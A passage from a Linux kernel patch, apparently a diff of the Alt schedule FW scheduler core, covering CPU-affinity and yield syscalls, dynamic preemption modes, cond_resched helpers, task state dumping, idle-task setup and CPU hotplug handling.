-+SYSCALL_DEFINE3(sched_setaffinity, pid_t, pid, unsigned int, len,
-+		unsigned long __user *, user_mask_ptr)
-+{
-+	cpumask_var_t new_mask;
-+	int retval;
-+
-+	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL))
-+		return -ENOMEM;
-+
-+	retval = get_user_cpu_mask(user_mask_ptr, len, new_mask);
-+	if (retval == 0)
-+		retval = sched_setaffinity(pid, new_mask);
-+	free_cpumask_var(new_mask);
-+	return retval;
-+}
-+
-+long sched_getaffinity(pid_t pid, cpumask_t *mask)
-+{
-+	struct task_struct *p;
-+	raw_spinlock_t *lock;
-+	unsigned long flags;
-+	int retval;
-+
-+	rcu_read_lock();
-+
-+	retval = -ESRCH;
-+	p = find_process_by_pid(pid);
-+	if (!p)
-+		goto out_unlock;
-+
-+	retval = security_task_getscheduler(p);
-+	if (retval)
-+		goto out_unlock;
-+
-+	task_access_lock_irqsave(p, &lock, &flags);
-+	cpumask_and(mask, &p->cpus_mask, cpu_active_mask);
-+	task_access_unlock_irqrestore(p, lock, &flags);
-+
-+out_unlock:
-+	rcu_read_unlock();
-+
-+	return retval;
-+}
-+
-+/**
-+ * sys_sched_getaffinity - get the CPU affinity of a process
-+ * @pid: pid of the process
-+ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
-+ * @user_mask_ptr: user-space pointer to hold the current CPU mask
-+ *
-+ * Return: size of CPU mask copied to user_mask_ptr on success. An
-+ * error code otherwise.
-+ */
-+SYSCALL_DEFINE3(sched_getaffinity, pid_t, pid, unsigned int, len,
-+		unsigned long __user *, user_mask_ptr)
-+{
-+	int ret;
-+	cpumask_var_t mask;
-+
-+	if ((len * BITS_PER_BYTE) < nr_cpu_ids)
-+		return -EINVAL;
-+	if (len & (sizeof(unsigned long)-1))
-+		return -EINVAL;
-+
-+	if (!alloc_cpumask_var(&mask, GFP_KERNEL))
-+		return -ENOMEM;
-+
-+	ret = sched_getaffinity(pid, mask);
-+	if (ret == 0) {
-+		unsigned int retlen = min_t(size_t, len, cpumask_size());
-+
-+		if (copy_to_user(user_mask_ptr, mask, retlen))
-+			ret = -EFAULT;
-+		else
-+			ret = retlen;
-+	}
-+	free_cpumask_var(mask);
-+
-+	return ret;
-+}
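-+
-+/*
-+ * Illustrative note (not part of this patch): the raw syscall returns the
-+ * number of bytes copied into the mask, while the glibc wrapper maps that
-+ * to 0 on success:
-+ *
-+ *	cpu_set_t set;
-+ *
-+ *	if (sched_getaffinity(0, sizeof(set), &set) == 0)	// glibc wrapper
-+ *		printf("%d CPUs in affinity mask\n", CPU_COUNT(&set));
-+ */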
-+
-+static void do_sched_yield(void)
-+{
-+	struct rq *rq;
-+	struct rq_flags rf;
-+
-+	if (!sched_yield_type)
-+		return;
-+
-+	rq = this_rq_lock_irq(&rf);
-+
-+	schedstat_inc(rq->yld_count);
-+
-+	if (1 == sched_yield_type) {
-+		if (!rt_task(current))
-+			do_sched_yield_type_1(current, rq);
-+	} else if (2 == sched_yield_type) {
-+		if (rq->nr_running > 1)
-+			rq->skip = current;
-+	}
-+
-+	preempt_disable();
-+	raw_spin_unlock_irq(&rq->lock);
-+	sched_preempt_enable_no_resched();
-+
-+	schedule();
-+}
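-+
-+/*
-+ * Note (illustrative, not part of this patch): as the code above shows,
-+ * the Alt schedule FW sched_yield_type knob selects the yield behaviour:
-+ * 0 makes sched_yield() a no-op, 1 deboosts/requeues a non-RT caller via
-+ * do_sched_yield_type_1(), and 2 marks the caller as rq->skip so it is
-+ * passed over at the next pick.
-+ */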
-+
-+/**
-+ * sys_sched_yield - yield the current processor to other threads.
-+ *
-+ * This function yields the current CPU to other tasks. If there are no
-+ * other threads running on this CPU then this function will return.
-+ *
-+ * Return: 0.
-+ */
-+SYSCALL_DEFINE0(sched_yield)
-+{
-+	do_sched_yield();
-+	return 0;
-+}
-+
-+#if !defined(CONFIG_PREEMPTION) || defined(CONFIG_PREEMPT_DYNAMIC)
-+int __sched __cond_resched(void)
-+{
-+	if (should_resched(0)) {
-+		preempt_schedule_common();
-+		return 1;
-+	}
-+	/*
-+	 * In preemptible kernels, ->rcu_read_lock_nesting tells the tick
-+	 * whether the current CPU is in an RCU read-side critical section,
-+	 * so the tick can report quiescent states even for CPUs looping
-+	 * in kernel context.  In contrast, in non-preemptible kernels,
-+	 * RCU readers leave no in-memory hints, which means that CPU-bound
-+	 * processes executing in kernel context might never report an
-+	 * RCU quiescent state.  Therefore, the following code causes
-+	 * cond_resched() to report a quiescent state, but only when RCU
-+	 * is in urgent need of one.
-+	 */
-+#ifndef CONFIG_PREEMPT_RCU
-+	rcu_all_qs();
-+#endif
-+	return 0;
-+}
-+EXPORT_SYMBOL(__cond_resched);
-+#endif
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
-+#define cond_resched_dynamic_enabled	__cond_resched
-+#define cond_resched_dynamic_disabled	((void *)&__static_call_return0)
-+DEFINE_STATIC_CALL_RET0(cond_resched, __cond_resched);
-+EXPORT_STATIC_CALL_TRAMP(cond_resched);
-+
-+#define might_resched_dynamic_enabled	__cond_resched
-+#define might_resched_dynamic_disabled	((void *)&__static_call_return0)
-+DEFINE_STATIC_CALL_RET0(might_resched, __cond_resched);
-+EXPORT_STATIC_CALL_TRAMP(might_resched);
-+#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
-+static DEFINE_STATIC_KEY_FALSE(sk_dynamic_cond_resched);
-+int __sched dynamic_cond_resched(void)
-+{
-+	if (!static_branch_unlikely(&sk_dynamic_cond_resched))
-+		return 0;
-+	return __cond_resched();
-+}
-+EXPORT_SYMBOL(dynamic_cond_resched);
-+
-+static DEFINE_STATIC_KEY_FALSE(sk_dynamic_might_resched);
-+int __sched dynamic_might_resched(void)
-+{
-+	if (!static_branch_unlikely(&sk_dynamic_might_resched))
-+		return 0;
-+	return __cond_resched();
-+}
-+EXPORT_SYMBOL(dynamic_might_resched);
-+#endif
-+#endif
-+
-+/*
-+ * __cond_resched_lock() - if a reschedule is pending, drop the given lock,
-+ * call schedule, and on return reacquire the lock.
-+ *
-+ * This works OK both with and without CONFIG_PREEMPTION.  We do strange low-level
-+ * operations here to prevent schedule() from being called twice (once via
-+ * spin_unlock(), once by hand).
-+ */
-+int __cond_resched_lock(spinlock_t *lock)
-+{
-+	int resched = should_resched(PREEMPT_LOCK_OFFSET);
-+	int ret = 0;
-+
-+	lockdep_assert_held(lock);
-+
-+	if (spin_needbreak(lock) || resched) {
-+		spin_unlock(lock);
-+		if (!_cond_resched())
-+			cpu_relax();
-+		ret = 1;
-+		spin_lock(lock);
-+	}
-+	return ret;
-+}
-+EXPORT_SYMBOL(__cond_resched_lock);
-+
-+int __cond_resched_rwlock_read(rwlock_t *lock)
-+{
-+	int resched = should_resched(PREEMPT_LOCK_OFFSET);
-+	int ret = 0;
-+
-+	lockdep_assert_held_read(lock);
-+
-+	if (rwlock_needbreak(lock) || resched) {
-+		read_unlock(lock);
-+		if (!_cond_resched())
-+			cpu_relax();
-+		ret = 1;
-+		read_lock(lock);
-+	}
-+	return ret;
-+}
-+EXPORT_SYMBOL(__cond_resched_rwlock_read);
-+
-+int __cond_resched_rwlock_write(rwlock_t *lock)
-+{
-+	int resched = should_resched(PREEMPT_LOCK_OFFSET);
-+	int ret = 0;
-+
-+	lockdep_assert_held_write(lock);
-+
-+	if (rwlock_needbreak(lock) || resched) {
-+		write_unlock(lock);
-+		if (!_cond_resched())
-+			cpu_relax();
-+		ret = 1;
-+		write_lock(lock);
-+	}
-+	return ret;
-+}
-+EXPORT_SYMBOL(__cond_resched_rwlock_write);
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+
-+#ifdef CONFIG_GENERIC_ENTRY
-+#include <linux/entry-common.h>
-+#endif
-+
-+/*
-+ * SC:cond_resched
-+ * SC:might_resched
-+ * SC:preempt_schedule
-+ * SC:preempt_schedule_notrace
-+ * SC:irqentry_exit_cond_resched
-+ *
-+ *
-+ * NONE:
-+ *   cond_resched               <- __cond_resched
-+ *   might_resched              <- RET0
-+ *   preempt_schedule           <- NOP
-+ *   preempt_schedule_notrace   <- NOP
-+ *   irqentry_exit_cond_resched <- NOP
-+ *
-+ * VOLUNTARY:
-+ *   cond_resched               <- __cond_resched
-+ *   might_resched              <- __cond_resched
-+ *   preempt_schedule           <- NOP
-+ *   preempt_schedule_notrace   <- NOP
-+ *   irqentry_exit_cond_resched <- NOP
-+ *
-+ * FULL:
-+ *   cond_resched               <- RET0
-+ *   might_resched              <- RET0
-+ *   preempt_schedule           <- preempt_schedule
-+ *   preempt_schedule_notrace   <- preempt_schedule_notrace
-+ *   irqentry_exit_cond_resched <- irqentry_exit_cond_resched
-+ */
-+
-+enum {
-+	preempt_dynamic_undefined = -1,
-+	preempt_dynamic_none,
-+	preempt_dynamic_voluntary,
-+	preempt_dynamic_full,
-+};
-+
-+int preempt_dynamic_mode = preempt_dynamic_undefined;
-+
-+int sched_dynamic_mode(const char *str)
-+{
-+	if (!strcmp(str, "none"))
-+		return preempt_dynamic_none;
-+
-+	if (!strcmp(str, "voluntary"))
-+		return preempt_dynamic_voluntary;
-+
-+	if (!strcmp(str, "full"))
-+		return preempt_dynamic_full;
-+
-+	return -EINVAL;
-+}
-+
-+#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
-+#define preempt_dynamic_enable(f)	static_call_update(f, f##_dynamic_enabled)
-+#define preempt_dynamic_disable(f)	static_call_update(f, f##_dynamic_disabled)
-+#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
-+#define preempt_dynamic_enable(f)	static_key_enable(&sk_dynamic_##f.key)
-+#define preempt_dynamic_disable(f)	static_key_disable(&sk_dynamic_##f.key)
-+#else
-+#error "Unsupported PREEMPT_DYNAMIC mechanism"
-+#endif
-+
-+void sched_dynamic_update(int mode)
-+{
-+	/*
-+	 * Avoid {NONE,VOLUNTARY} -> FULL transitions from ever ending up in
-+	 * the ZERO state, which is invalid.
-+	 */
-+	preempt_dynamic_enable(cond_resched);
-+	preempt_dynamic_enable(might_resched);
-+	preempt_dynamic_enable(preempt_schedule);
-+	preempt_dynamic_enable(preempt_schedule_notrace);
-+	preempt_dynamic_enable(irqentry_exit_cond_resched);
-+
-+	switch (mode) {
-+	case preempt_dynamic_none:
-+		preempt_dynamic_enable(cond_resched);
-+		preempt_dynamic_disable(might_resched);
-+		preempt_dynamic_disable(preempt_schedule);
-+		preempt_dynamic_disable(preempt_schedule_notrace);
-+		preempt_dynamic_disable(irqentry_exit_cond_resched);
-+		pr_info("Dynamic Preempt: none\n");
-+		break;
-+
-+	case preempt_dynamic_voluntary:
-+		preempt_dynamic_enable(cond_resched);
-+		preempt_dynamic_enable(might_resched);
-+		preempt_dynamic_disable(preempt_schedule);
-+		preempt_dynamic_disable(preempt_schedule_notrace);
-+		preempt_dynamic_disable(irqentry_exit_cond_resched);
-+		pr_info("Dynamic Preempt: voluntary\n");
-+		break;
-+
-+	case preempt_dynamic_full:
-+		preempt_dynamic_disable(cond_resched);
-+		preempt_dynamic_disable(might_resched);
-+		preempt_dynamic_enable(preempt_schedule);
-+		preempt_dynamic_enable(preempt_schedule_notrace);
-+		preempt_dynamic_enable(irqentry_exit_cond_resched);
-+		pr_info("Dynamic Preempt: full\n");
-+		break;
-+	}
-+
-+	preempt_dynamic_mode = mode;
-+}
-+
-+static int __init setup_preempt_mode(char *str)
-+{
-+	int mode = sched_dynamic_mode(str);
-+	if (mode < 0) {
-+		pr_warn("Dynamic Preempt: unsupported mode: %s\n", str);
-+		return 0;
-+	}
-+
-+	sched_dynamic_update(mode);
-+	return 1;
-+}
-+__setup("preempt=", setup_preempt_mode);
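-+
-+/*
-+ * Illustrative usage (not part of this patch): the dynamic preemption
-+ * model is chosen on the kernel command line, e.g.
-+ *
-+ *	preempt=voluntary
-+ *
-+ * In mainline the mode can also be flipped at runtime through debugfs
-+ * (/sys/kernel/debug/sched/preempt) where that interface is built in.
-+ */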
-+
-+static void __init preempt_dynamic_init(void)
-+{
-+	if (preempt_dynamic_mode == preempt_dynamic_undefined) {
-+		if (IS_ENABLED(CONFIG_PREEMPT_NONE)) {
-+			sched_dynamic_update(preempt_dynamic_none);
-+		} else if (IS_ENABLED(CONFIG_PREEMPT_VOLUNTARY)) {
-+			sched_dynamic_update(preempt_dynamic_voluntary);
-+		} else {
-+			/* Default static call setting, nothing to do */
-+			WARN_ON_ONCE(!IS_ENABLED(CONFIG_PREEMPT));
-+			preempt_dynamic_mode = preempt_dynamic_full;
-+			pr_info("Dynamic Preempt: full\n");
-+		}
-+	}
-+}
-+
-+#define PREEMPT_MODEL_ACCESSOR(mode) \
-+	bool preempt_model_##mode(void)						 \
-+	{									 \
-+		WARN_ON_ONCE(preempt_dynamic_mode == preempt_dynamic_undefined); \
-+		return preempt_dynamic_mode == preempt_dynamic_##mode;		 \
-+	}									 \
-+	EXPORT_SYMBOL_GPL(preempt_model_##mode)
-+
-+PREEMPT_MODEL_ACCESSOR(none);
-+PREEMPT_MODEL_ACCESSOR(voluntary);
-+PREEMPT_MODEL_ACCESSOR(full);
-+
-+#else /* !CONFIG_PREEMPT_DYNAMIC */
-+
-+static inline void preempt_dynamic_init(void) { }
-+
-+#endif /* #ifdef CONFIG_PREEMPT_DYNAMIC */
-+
-+/**
-+ * yield - yield the current processor to other threads.
-+ *
-+ * Do not ever use this function, there's a 99% chance you're doing it wrong.
-+ *
-+ * The scheduler is at all times free to pick the calling task as the most
-+ * eligible task to run, if removing the yield() call from your code breaks
-+ * it, it's already broken.
-+ *
-+ * Typical broken usage is:
-+ *
-+ * while (!event)
-+ * 	yield();
-+ *
-+ * where one assumes that yield() will let 'the other' process run that will
-+ * make event true. If the current task is a SCHED_FIFO task that will never
-+ * happen. Never use yield() as a progress guarantee!!
-+ *
-+ * If you want to use yield() to wait for something, use wait_event().
-+ * If you want to use yield() to be 'nice' for others, use cond_resched().
-+ * If you still want to use yield(), do not!
-+ */
-+void __sched yield(void)
-+{
-+	set_current_state(TASK_RUNNING);
-+	do_sched_yield();
-+}
-+EXPORT_SYMBOL(yield);
-+
-+/**
-+ * yield_to - yield the current processor to another thread in
-+ * your thread group, or accelerate that thread toward the
-+ * processor it's on.
-+ * @p: target task
-+ * @preempt: whether task preemption is allowed or not
-+ *
-+ * It's the caller's job to ensure that the target task struct
-+ * can't go away on us before we can do any checks.
-+ *
-+ * In Alt schedule FW, yield_to is not supported.
-+ *
-+ * Return:
-+ *	true (>0) if we indeed boosted the target task.
-+ *	false (0) if we failed to boost the target.
-+ *	-ESRCH if there's no task to yield to.
-+ */
-+int __sched yield_to(struct task_struct *p, bool preempt)
-+{
-+	return 0;
-+}
-+EXPORT_SYMBOL_GPL(yield_to);
-+
-+int io_schedule_prepare(void)
-+{
-+	int old_iowait = current->in_iowait;
-+
-+	current->in_iowait = 1;
-+	blk_flush_plug(current->plug, true);
-+	return old_iowait;
-+}
-+
-+void io_schedule_finish(int token)
-+{
-+	current->in_iowait = token;
-+}
-+
-+/*
-+ * This task is about to go to sleep on IO.  Increment rq->nr_iowait so
-+ * that process accounting knows that this is a task in IO wait state.
-+ *
-+ * But don't do that if it is a deliberate, throttling IO wait (this task
-+ * has set its backing_dev_info: the queue against which it should throttle)
-+ */
-+
-+long __sched io_schedule_timeout(long timeout)
-+{
-+	int token;
-+	long ret;
-+
-+	token = io_schedule_prepare();
-+	ret = schedule_timeout(timeout);
-+	io_schedule_finish(token);
-+
-+	return ret;
-+}
-+EXPORT_SYMBOL(io_schedule_timeout);
-+
-+void __sched io_schedule(void)
-+{
-+	int token;
-+
-+	token = io_schedule_prepare();
-+	schedule();
-+	io_schedule_finish(token);
-+}
-+EXPORT_SYMBOL(io_schedule);
-+
-+/**
-+ * sys_sched_get_priority_max - return maximum RT priority.
-+ * @policy: scheduling class.
-+ *
-+ * Return: On success, this syscall returns the maximum
-+ * rt_priority that can be used by a given scheduling class.
-+ * On failure, a negative error code is returned.
-+ */
-+SYSCALL_DEFINE1(sched_get_priority_max, int, policy)
-+{
-+	int ret = -EINVAL;
-+
-+	switch (policy) {
-+	case SCHED_FIFO:
-+	case SCHED_RR:
-+		ret = MAX_RT_PRIO - 1;
-+		break;
-+	case SCHED_NORMAL:
-+	case SCHED_BATCH:
-+	case SCHED_IDLE:
-+		ret = 0;
-+		break;
-+	}
-+	return ret;
-+}
-+
-+/**
-+ * sys_sched_get_priority_min - return minimum RT priority.
-+ * @policy: scheduling class.
-+ *
-+ * Return: On success, this syscall returns the minimum
-+ * rt_priority that can be used by a given scheduling class.
-+ * On failure, a negative error code is returned.
-+ */
-+SYSCALL_DEFINE1(sched_get_priority_min, int, policy)
-+{
-+	int ret = -EINVAL;
-+
-+	switch (policy) {
-+	case SCHED_FIFO:
-+	case SCHED_RR:
-+		ret = 1;
-+		break;
-+	case SCHED_NORMAL:
-+	case SCHED_BATCH:
-+	case SCHED_IDLE:
-+		ret = 0;
-+		break;
-+	}
-+	return ret;
-+}
-+
-+static int sched_rr_get_interval(pid_t pid, struct timespec64 *t)
-+{
-+	struct task_struct *p;
-+	int retval;
-+
-+	alt_sched_debug();
-+
-+	if (pid < 0)
-+		return -EINVAL;
-+
-+	retval = -ESRCH;
-+	rcu_read_lock();
-+	p = find_process_by_pid(pid);
-+	if (!p)
-+		goto out_unlock;
-+
-+	retval = security_task_getscheduler(p);
-+	if (retval)
-+		goto out_unlock;
-+	rcu_read_unlock();
-+
-+	*t = ns_to_timespec64(sched_timeslice_ns);
-+	return 0;
-+
-+out_unlock:
-+	rcu_read_unlock();
-+	return retval;
-+}
-+
-+/**
-+ * sys_sched_rr_get_interval - return the default timeslice of a process.
-+ * @pid: pid of the process.
-+ * @interval: userspace pointer to the timeslice value.
-+ *
-+ * Return: On success, 0 and the timeslice is in @interval. Otherwise,
-+ * an error code.
-+ */
-+SYSCALL_DEFINE2(sched_rr_get_interval, pid_t, pid,
-+		struct __kernel_timespec __user *, interval)
-+{
-+	struct timespec64 t;
-+	int retval = sched_rr_get_interval(pid, &t);
-+
-+	if (retval == 0)
-+		retval = put_timespec64(&t, interval);
-+
-+	return retval;
-+}
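-+
-+/*
-+ * Note (illustrative, not part of this patch): unlike mainline, which
-+ * reports a per-task round-robin interval, the helper above returns the
-+ * fixed Alt schedule FW timeslice (sched_timeslice_ns) for every pid:
-+ *
-+ *	struct timespec ts;
-+ *
-+ *	sched_rr_get_interval(0, &ts);	// same value for any policy
-+ */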
-+
-+#ifdef CONFIG_COMPAT_32BIT_TIME
-+SYSCALL_DEFINE2(sched_rr_get_interval_time32, pid_t, pid,
-+		struct old_timespec32 __user *, interval)
-+{
-+	struct timespec64 t;
-+	int retval = sched_rr_get_interval(pid, &t);
-+
-+	if (retval == 0)
-+		retval = put_old_timespec32(&t, interval);
-+	return retval;
-+}
-+#endif
-+
-+void sched_show_task(struct task_struct *p)
-+{
-+	unsigned long free = 0;
-+	int ppid;
-+
-+	if (!try_get_task_stack(p))
-+		return;
-+
-+	pr_info("task:%-15.15s state:%c", p->comm, task_state_to_char(p));
-+
-+	if (task_is_running(p))
-+		pr_cont("  running task    ");
-+#ifdef CONFIG_DEBUG_STACK_USAGE
-+	free = stack_not_used(p);
-+#endif
-+	ppid = 0;
-+	rcu_read_lock();
-+	if (pid_alive(p))
-+		ppid = task_pid_nr(rcu_dereference(p->real_parent));
-+	rcu_read_unlock();
-+	pr_cont(" stack:%-5lu pid:%-5d ppid:%-6d flags:0x%08lx\n",
-+		free, task_pid_nr(p), ppid,
-+		read_task_thread_flags(p));
-+
-+	print_worker_info(KERN_INFO, p);
-+	print_stop_info(KERN_INFO, p);
-+	show_stack(p, NULL, KERN_INFO);
-+	put_task_stack(p);
-+}
-+EXPORT_SYMBOL_GPL(sched_show_task);
-+
-+static inline bool
-+state_filter_match(unsigned long state_filter, struct task_struct *p)
-+{
-+	unsigned int state = READ_ONCE(p->__state);
-+
-+	/* no filter, everything matches */
-+	if (!state_filter)
-+		return true;
-+
-+	/* filter, but doesn't match */
-+	if (!(state & state_filter))
-+		return false;
-+
-+	/*
-+	 * When looking for TASK_UNINTERRUPTIBLE skip TASK_IDLE (allows
-+	 * TASK_KILLABLE).
-+	 */
-+	if (state_filter == TASK_UNINTERRUPTIBLE && (state & TASK_NOLOAD))
-+		return false;
-+
-+	return true;
-+}
-+
-+void show_state_filter(unsigned int state_filter)
-+{
-+	struct task_struct *g, *p;
-+
-+	rcu_read_lock();
-+	for_each_process_thread(g, p) {
-+		/*
-+		 * Reset the NMI-timeout; listing all tasks on a slow
-+		 * console might take a lot of time.
-+		 * Also, reset softlockup watchdogs on all CPUs, because
-+		 * another CPU might be blocked waiting for us to process
-+		 * an IPI.
-+		 */
-+		touch_nmi_watchdog();
-+		touch_all_softlockup_watchdogs();
-+		if (state_filter_match(state_filter, p))
-+			sched_show_task(p);
-+	}
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+	/* TODO: Alt schedule FW should support this
-+	if (!state_filter)
-+		sysrq_sched_debug_show();
-+	*/
-+#endif
-+	rcu_read_unlock();
-+	/*
-+	 * Only show locks if all tasks are dumped:
-+	 */
-+	if (!state_filter)
-+		debug_show_all_locks();
-+}
-+
-+void dump_cpu_task(int cpu)
-+{
-+	if (cpu == smp_processor_id() && in_hardirq()) {
-+		struct pt_regs *regs;
-+
-+		regs = get_irq_regs();
-+		if (regs) {
-+			show_regs(regs);
-+			return;
-+		}
-+	}
-+
-+	if (trigger_single_cpu_backtrace(cpu))
-+		return;
-+
-+	pr_info("Task dump for CPU %d:\n", cpu);
-+	sched_show_task(cpu_curr(cpu));
-+}
-+
-+/**
-+ * init_idle - set up an idle thread for a given CPU
-+ * @idle: task in question
-+ * @cpu: CPU the idle task belongs to
-+ *
-+ * NOTE: this function does not set the idle thread's NEED_RESCHED
-+ * flag, to make booting more robust.
-+ */
-+void __init init_idle(struct task_struct *idle, int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	__sched_fork(0, idle);
-+
-+	raw_spin_lock_irqsave(&idle->pi_lock, flags);
-+	raw_spin_lock(&rq->lock);
-+
-+	idle->last_ran = rq->clock_task;
-+	idle->__state = TASK_RUNNING;
-+	/*
-+	 * PF_KTHREAD should already be set at this point; regardless, make it
-+	 * look like a proper per-CPU kthread.
-+	 */
-+	idle->flags |= PF_IDLE | PF_KTHREAD | PF_NO_SETAFFINITY;
-+	kthread_set_per_cpu(idle, cpu);
-+
-+	sched_queue_init_idle(&rq->queue, idle);
-+
-+#ifdef CONFIG_SMP
-+	/*
-+	 * It's possible that init_idle() gets called multiple times on a task,
-+	 * in that case do_set_cpus_allowed() will not do the right thing.
-+	 *
-+	 * And since this is boot we can forgo the serialisation.
-+	 */
-+	set_cpus_allowed_common(idle, cpumask_of(cpu));
-+#endif
-+
-+	/* Silence PROVE_RCU */
-+	rcu_read_lock();
-+	__set_task_cpu(idle, cpu);
-+	rcu_read_unlock();
-+
-+	rq->idle = idle;
-+	rcu_assign_pointer(rq->curr, idle);
-+	idle->on_cpu = 1;
-+
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock_irqrestore(&idle->pi_lock, flags);
-+
-+	/* Set the preempt count _outside_ the spinlocks! */
-+	init_idle_preempt_count(idle, cpu);
-+
-+	ftrace_graph_init_idle_task(idle, cpu);
-+	vtime_init_idle(idle, cpu);
-+#ifdef CONFIG_SMP
-+	sprintf(idle->comm, "%s/%d", INIT_TASK_COMM, cpu);
-+#endif
-+}
-+
-+#ifdef CONFIG_SMP
-+
-+int cpuset_cpumask_can_shrink(const struct cpumask __maybe_unused *cur,
-+			      const struct cpumask __maybe_unused *trial)
-+{
-+	return 1;
-+}
-+
-+int task_can_attach(struct task_struct *p,
-+		    const struct cpumask *cs_effective_cpus)
-+{
-+	int ret = 0;
-+
-+	/*
-+	 * Kthreads which disallow setaffinity shouldn't be moved
-+	 * to a new cpuset; we don't want to change their CPU
-+	 * affinity and isolating such threads by their set of
-+	 * allowed nodes is unnecessary.  Thus, cpusets are not
-+	 * applicable for such threads.  This prevents checking for
-+	 * success of set_cpus_allowed_ptr() on all attached tasks
-+	 * before cpus_mask may be changed.
-+	 */
-+	if (p->flags & PF_NO_SETAFFINITY)
-+		ret = -EINVAL;
-+
-+	return ret;
-+}
-+
-+bool sched_smp_initialized __read_mostly;
-+
-+#ifdef CONFIG_HOTPLUG_CPU
-+/*
-+ * Ensures that the idle task is using init_mm right before its CPU goes
-+ * offline.
-+ */
-+void idle_task_exit(void)
-+{
-+	struct mm_struct *mm = current->active_mm;
-+
-+	BUG_ON(current != this_rq()->idle);
-+
-+	if (mm != &init_mm) {
-+		switch_mm(mm, &init_mm, current);
-+		finish_arch_post_lock_switch();
-+	}
-+
-+	/* finish_cpu(), as ran on the BP, will clean up the active_mm state */
-+}
-+
-+static int __balance_push_cpu_stop(void *arg)
-+{
-+	struct task_struct *p = arg;
-+	struct rq *rq = this_rq();
-+	struct rq_flags rf;
-+	int cpu;
-+
-+	raw_spin_lock_irq(&p->pi_lock);
-+	rq_lock(rq, &rf);
-+
-+	update_rq_clock(rq);
-+
-+	if (task_rq(p) == rq && task_on_rq_queued(p)) {
-+		cpu = select_fallback_rq(rq->cpu, p);
-+		rq = __migrate_task(rq, p, cpu);
-+	}
-+
-+	rq_unlock(rq, &rf);
-+	raw_spin_unlock_irq(&p->pi_lock);
-+
-+	put_task_struct(p);
-+
-+	return 0;
-+}
-+
-+static DEFINE_PER_CPU(struct cpu_stop_work, push_work);
-+
-+/*
-+ * This is enabled below SCHED_AP_ACTIVE, i.e. when !cpu_active(), but it
-+ * only takes effect while the CPU is going down (hotplug offline).
-+ */
-+static void balance_push(struct rq *rq)
-+{
-+	struct task_struct *push_task = rq->curr;
-+
-+	lockdep_assert_held(&rq->lock);
-+
-+	/*
-+	 * Ensure the thing is persistent until balance_push_set(.on = false);
-+	 */
-+	rq->balance_callback = &balance_push_callback;
-+
-+	/*
-+	 * Only active while going offline and when invoked on the outgoing
-+	 * CPU.
-+	 */
-+	if (!cpu_dying(rq->cpu) || rq != this_rq())
-+		return;
-+
-+	/*
-+	 * Both the cpu-hotplug and stop task are in this case and are
-+	 * required to complete the hotplug process.
-+	 */
-+	if (kthread_is_per_cpu(push_task) ||
-+	    is_migration_disabled(push_task)) {
-+
-+		/*
-+		 * If this is the idle task on the outgoing CPU try to wake
-+		 * up the hotplug control thread which might wait for the
-+		 * last task to vanish. The rcuwait_active() check is
-+		 * accurate here because the waiter is pinned on this CPU
-+		 * and can't obviously be running in parallel.
-+		 *
-+		 * On RT kernels this also has to check whether there are
-+		 * pinned and scheduled out tasks on the runqueue. They
-+		 * need to leave the migrate disabled section first.
-+		 */
-+		if (!rq->nr_running && !rq_has_pinned_tasks(rq) &&
-+		    rcuwait_active(&rq->hotplug_wait)) {
-+			raw_spin_unlock(&rq->lock);
-+			rcuwait_wake_up(&rq->hotplug_wait);
-+			raw_spin_lock(&rq->lock);
-+		}
-+		return;
-+	}
-+
-+	get_task_struct(push_task);
-+	/*
-+	 * Temporarily drop rq->lock such that we can wake-up the stop task.
-+	 * Both preemption and IRQs are still disabled.
-+	 */
-+	raw_spin_unlock(&rq->lock);
-+	stop_one_cpu_nowait(rq->cpu, __balance_push_cpu_stop, push_task,
-+			    this_cpu_ptr(&push_work));
-+	/*
-+	 * At this point need_resched() is true and we'll take the loop in
-+	 * schedule(). The next pick is obviously going to be the stop task,
-+	 * for which kthread_is_per_cpu() holds, and it will push this task away.
-+	 */
-+	raw_spin_lock(&rq->lock);
-+}
-+
-+static void balance_push_set(int cpu, bool on)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	struct rq_flags rf;
-+
-+	rq_lock_irqsave(rq, &rf);
-+	if (on) {
-+		WARN_ON_ONCE(rq->balance_callback);
-+		rq->balance_callback = &balance_push_callback;
-+	} else if (rq->balance_callback == &balance_push_callback) {
-+		rq->balance_callback = NULL;
-+	}
-+	rq_unlock_irqrestore(rq, &rf);
-+}
-+
-+/*
-+ * Invoked from a CPUs hotplug control thread after the CPU has been marked
-+ * inactive. All tasks which are not per CPU kernel threads are either
-+ * pushed off this CPU now via balance_push() or placed on a different CPU
-+ * during wakeup. Wait until the CPU is quiescent.
-+ */
-+static void balance_hotplug_wait(void)
-+{
-+	struct rq *rq = this_rq();
-+
-+	rcuwait_wait_event(&rq->hotplug_wait,
-+			   rq->nr_running == 1 && !rq_has_pinned_tasks(rq),
-+			   TASK_UNINTERRUPTIBLE);
-+}
-+
-+#else
-+
-+static void balance_push(struct rq *rq)
-+{
-+}
-+
-+static void balance_push_set(int cpu, bool on)
-+{
-+}
-+
-+static inline void balance_hotplug_wait(void)
-+{
-+}
-+#endif /* CONFIG_HOTPLUG_CPU */
-+
-+static void set_rq_offline(struct rq *rq)
-+{
-+	if (rq->online)
-+		rq->online = false;
-+}
-+
-+static void set_rq_online(struct rq *rq)
-+{
-+	if (!rq->online)
-+		rq->online = true;
-+}
-+
-+/*
-+ * used to mark begin/end of suspend/resume:
-+ */
-+static int num_cpus_frozen;
-+
-+/*
-+ * Update cpusets according to cpu_active mask.  If cpusets are
-+ * disabled, cpuset_update_active_cpus() becomes a simple wrapper
-+ * around partition_sched_domains().
-+ *
-+ * If we come here as part of a suspend/resume, don't touch cpusets because we
-+ * want to restore it back to its original state upon resume anyway.
-+ */
-+static void cpuset_cpu_active(void)
-+{
-+	if (cpuhp_tasks_frozen) {
-+		/*
-+		 * num_cpus_frozen tracks how many CPUs are involved in the
-+		 * suspend/resume sequence. As long as this is not the last online
-+		 * operation in the resume sequence, just build a single sched
-+		 * domain, ignoring cpusets.
-+		 */
